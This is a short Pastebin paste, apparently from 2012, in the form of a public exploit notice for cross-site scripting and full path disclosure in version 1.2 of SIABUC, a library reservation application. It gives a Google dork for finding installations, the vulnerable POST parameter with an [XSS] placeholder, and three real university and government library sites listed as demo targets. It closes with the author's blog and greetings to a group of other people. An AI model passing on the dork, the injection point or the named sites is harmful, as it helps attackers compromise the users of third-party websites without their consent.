Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # Exploit Title: XSS & Full Path Disclosure SIABUC
- # Date: 24/02/2012
- # Author: MaztoR
- # Vendor or Software Link: http://siabuc.ucol.mx/
- # Version: Version 1.2 [Other versions "NO TESTED"]
- # Category: webapps Library
- # Google dork: inurl:/Reservacion/index.php
- # Tested on: Linux
- =====================================
- Exploit
- =====================================
- POST:> txtbuscar=[XSS]&paso=2&opciones=0
- =====================================
- DEMO
- =====================================
- http://www.biblioteca.ucm.edu.co/Reservacion/index.php
- http://www.ideartes.edu.co:8090/reservacion/index.php
- http://biblioteca.mirex.gov.do/reservacion/index.php
- ----------------------------------
- Blog: maztor.blogspot.com
- Twitter: @Mazt0r
- ----------------------------------
- Greetz: HielaSangre - Linuxfer - SunPlace - xDarkStonex - SeguridadBlanca
- ALL USERS #RE - DDLR
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement